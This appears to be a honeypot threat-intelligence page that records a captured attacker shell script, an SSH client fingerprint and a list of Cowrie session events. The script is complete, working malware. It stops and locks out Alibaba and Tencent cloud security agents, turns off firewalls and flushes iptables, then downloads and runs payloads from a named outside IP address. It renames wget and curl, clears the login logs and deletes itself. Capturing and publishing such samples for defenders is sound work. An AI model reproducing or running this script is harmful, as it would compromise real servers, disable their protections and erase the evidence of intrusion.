#!/bin/sh; ; wdir="/tmp"; for i in "/tmp" "/var/tmp" "/dev/shm" "/usr" "/bin" "/home" "/root"; do; if [ -w "$i" ]; then; wdir="$i"; break; fi; done; cd "$wdir" || exit 1; ; ; ; ; systemctl stop aegis >/dev/null 2>&1; systemctl disable aegis >/dev/null 2>&1; systemctl stop aliyun >/dev/null 2>&1; systemctl disable aliyun >/dev/null 2>&1; ; ; systemctl mask aegis >/dev/null 2>&1; systemctl mask aliyun >/dev/null 2>&1; systemctl daemon-reload; ; ; if command -v chattr >/dev/null 2>&1; then; chattr -R -i -a /usr/local/aegis/ >/dev/null 2>&1; fi; ; ; pkill -9 AliYunDun >/dev/null 2>&1; pkill -9 AliYunDunMonitor >/dev/null 2>&1; pkill -9 aegis_update >/dev/null 2>&1; pkill -9 CmsGoAgent >/dev/null 2>&1; ; ; rm -rf /usr/local/aegis >/dev/null 2>&1; rm -rf /etc/init.d/aegis >/dev/null 2>&1; ; ; mkdir -p /usr/local/aegis; if command -v chattr >/dev/null 2>&1; then; chattr +i /usr/local/aegis; fi; ; ; ; ; systemctl stop YDService >/dev/null 2>&1; systemctl disable YDService >/dev/null 2>&1; systemctl stop tat_agent >/dev/null 2>&1; systemctl disable tat_agent >/dev/null 2>&1; ; ; systemctl mask YDService >/dev/null 2>&1; systemctl mask tat_agent >/dev/null 2>&1; ; ; systemctl daemon-reload; ; ; if command -v chattr >/dev/null 2>&1; then; chattr -R -i -a /usr/local/qcloud/ >/dev/null 2>&1; fi; ; ; pkill -9 YDService >/dev/null 2>&1; pkill -9 YDLive >/dev/null 2>&1; ; ; rm -rf /usr/local/qcloud/YunJing >/dev/null 2>&1; rm -rf /usr/local/qcloud/stargate >/dev/null 2>&1; rm -rf /usr/local/qcloud/monitor >/dev/null 2>&1; rm -rf /usr/local/qcloud/tat_agent >/dev/null 2>&1; ; mkdir -p /usr/local/qcloud/YunJing; mkdir -p /usr/local/qcloud/tat_agent; if command -v chattr >/dev/null 2>&1; then; chattr +i /usr/local/qcloud/YunJing; chattr +i /usr/local/qcloud/tat_agent; fi; ; ; ; disable_firewall() {; systemctl stop firewalld ufw >/dev/null 2>&1; systemctl disable firewalld ufw >/dev/null 2>&1; service firewalld stop >/dev/null 2>&1; service ufw stop >/dev/null 2>&1; ; if command -v iptables >/dev/null 2>&1; then; iptables -P INPUT ACCEPT >/dev/null 2>&1; iptables -P FORWARD ACCEPT >/dev/null 2>&1; iptables -P OUTPUT ACCEPT >/dev/null 2>&1; iptables -F >/dev/null 2>&1; iptables -X >/dev/null 2>&1; iptables -t nat -F >/dev/null 2>&1; iptables -t nat -X >/dev/null 2>&1; fi; }; disable_firewall; ; download_and_run() {; url="$1"; filename="$2"; ; if [ -f "./$filename" ] && [ -x "./$filename" ]; then; setsid "./$filename" >/dev/null 2>&1 &; return 0; fi; ; dl_bin=""; dl_args=""; ; if command -v good >/dev/null 2>&1; then; dl_bin="good"; dl_args="--no-check-certificate -q $url -O $filename"; elif command -v cool >/dev/null 2>&1; then; dl_bin="cool"; dl_args="-skL $url -o $filename"; elif command -v wget >/dev/null 2>&1; then; dl_bin="wget"; dl_args="--no-check-certificate -q $url -O $filename"; elif command -v curl >/dev/null 2>&1; then; dl_bin="curl"; dl_args="-skL $url -o $filename"; fi; ; if [ -z "$dl_bin" ]; then; apt-get update >/dev/null 2>&1 && apt-get install -y wget curl >/dev/null 2>&1; yum install -y wget curl >/dev/null 2>&1; if command -v wget >/dev/null 2>&1; then; dl_bin="wget"; dl_args="--no-check-certificate -q $url -O $filename"; fi; fi; ; if [ -n "$dl_bin" ]; then; $dl_bin $dl_args >/dev/null 2>&1; if [ -f "$filename" ]; then; chmod +x "$filename"; setsid "./$filename" >/dev/null 2>&1 &; fi; fi; }; ; lock_tools() {; command -v chattr >/dev/null 2>&1 && chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1; ; w_path=$(which wget 2>/dev/null); if [ -n "$w_path" ]; then; case "$w_path" in; *good*) ;;; *) mv "$w_path" "$(dirname "$w_path")/good" >/dev/null 2>&1 ;;; esac; fi; ; c_path=$(which curl 2>/dev/null); if [ -n "$c_path" ]; then; case "$c_path" in; *cool*) ;;; *) mv "$c_path" "$(dirname "$c_path")/cool" >/dev/null 2>&1 ;;; esac; fi; }; ; SERVER_IP="23.160.56.119"; download_and_run "http://$SERVER_IP/vos.txt" "system_update"; download_and_run "http://$SERVER_IP/vox.txt" "network_conf"; ; lock_tools; ; cleanup() {; for log in /var/log/wtmp /var/log/btmp /var/log/lastlog /var/log/syslog /var/log/auth.log; do; if [ -f "$log" ]; then; echo > "$log" 2>/dev/null; fi; done; rm -f "$0"; }; cleanup; ; rm -- "$0"; rm -f /root/vos.sh; rm -f /tmp.vos.sh; exit 0
/bin/skhqwensw
/bin/skhqwensw
ls -la /var/run/gcc.pid

Fingerprints

HASSH

57446c12547a668110aa237e5965e374

SSH Client

SSH-2.0-PUTTY

Recent Events (last 50)

Timestamp	Port	Proto	Event	Location
2026-03-09 16:16:10	:22	ssh	cowrie.session.closed	sea
2026-03-09 16:16:10	:22	ssh	cowrie.log.closed	sea
2026-03-09 16:16:10	:22	ssh	cowrie.command.input	sea
2026-03-09 16:16:10	:22	ssh	cowrie.session.params	sea
2026-03-09 16:16:10	:22	ssh	cowrie.client.size	sea
2026-03-09 16:16:10	:22	ssh	cowrie.log.closed	sea
2026-03-09 16:16:09	:22	ssh	cowrie.command.failed	sea
2026-03-09 16:16:09	:22	ssh	cowrie.command.input	sea
2026-03-09 16:16:09	:22	ssh	cowrie.session.params	sea
2026-03-09 16:16:09	:22	ssh	cowrie.client.size	sea
2026-03-09 16:16:09	:22	ssh	cowrie.session.file_upload	sea
2026-03-09 16:15:06	:22	ssh	cowrie.command.input	sea
2026-03-09 16:15:06	:22	ssh	cowrie.session.params	sea
2026-03-09 16:15:06	:22	ssh	cowrie.client.size	sea
2026-03-09 16:15:05	:22	ssh	cowrie.login.success	sea
2026-03-09 16:15:05	:22	ssh	cowrie.client.kex	sea
2026-03-09 16:15:05	:22	ssh	cowrie.client.version	sea
2026-03-09 16:15:05	:22	ssh	cowrie.session.connect	sea
2026-03-09 16:11:52	:22	ssh	cowrie.session.closed	sin
2026-03-09 16:11:52	:22	ssh	cowrie.log.closed	sin
2026-03-09 16:11:51	:22	ssh	cowrie.command.input	sin
2026-03-09 16:11:51	:22	ssh	cowrie.session.params	sin
2026-03-09 16:11:51	:22	ssh	cowrie.client.size	sin
2026-03-09 16:11:51	:22	ssh	cowrie.log.closed	sin
2026-03-09 16:11:51	:22	ssh	cowrie.command.failed	sin
2026-03-09 16:11:51	:22	ssh	cowrie.command.input	sin
2026-03-09 16:11:51	:22	ssh	cowrie.session.params	sin
2026-03-09 16:11:50	:22	ssh	cowrie.client.size	sin
2026-03-09 16:11:50	:22	ssh	cowrie.session.file_upload	sin
2026-03-09 16:10:18	:22	ssh	cowrie.command.input	sin
2026-03-09 16:10:18	:22	ssh	cowrie.session.params	sin
2026-03-09 16:10:18	:22	ssh	cowrie.client.size	sin
2026-03-09 16:10:17	:22	ssh	cowrie.login.success	sin
2026-03-09 16:10:16	:22	ssh	cowrie.client.kex	sin
2026-03-09 16:10:16	:22	ssh	cowrie.client.version	sin
2026-03-09 16:10:16	:22	ssh	cowrie.session.connect	sin
2026-03-09 04:20:36	:22	ssh	cowrie.session.closed	sin
2026-03-09 04:20:36	:22	ssh	cowrie.log.closed	sin
2026-03-09 04:20:36	:22	ssh	cowrie.command.input	sin
2026-03-09 04:20:36	:22	ssh	cowrie.session.params	sin
2026-03-09 04:20:36	:22	ssh	cowrie.client.size	sin
2026-03-09 04:20:35	:22	ssh	cowrie.log.closed	sin
2026-03-09 04:20:35	:22	ssh	cowrie.command.failed	sin
2026-03-09 04:20:35	:22	ssh	cowrie.command.input	sin
2026-03-09 04:20:35	:22	ssh	cowrie.session.params	sin
2026-03-09 04:20:35	:22	ssh	cowrie.client.size	sin
2026-03-09 04:20:35	:22	ssh	cowrie.session.file_upload	sin
2026-03-09 04:19:08	:22	ssh	cowrie.command.input	sin
2026-03-09 04:19:08	:22	ssh	cowrie.session.params	sin
2026-03-09 04:19:07	:22	ssh	cowrie.client.size	sin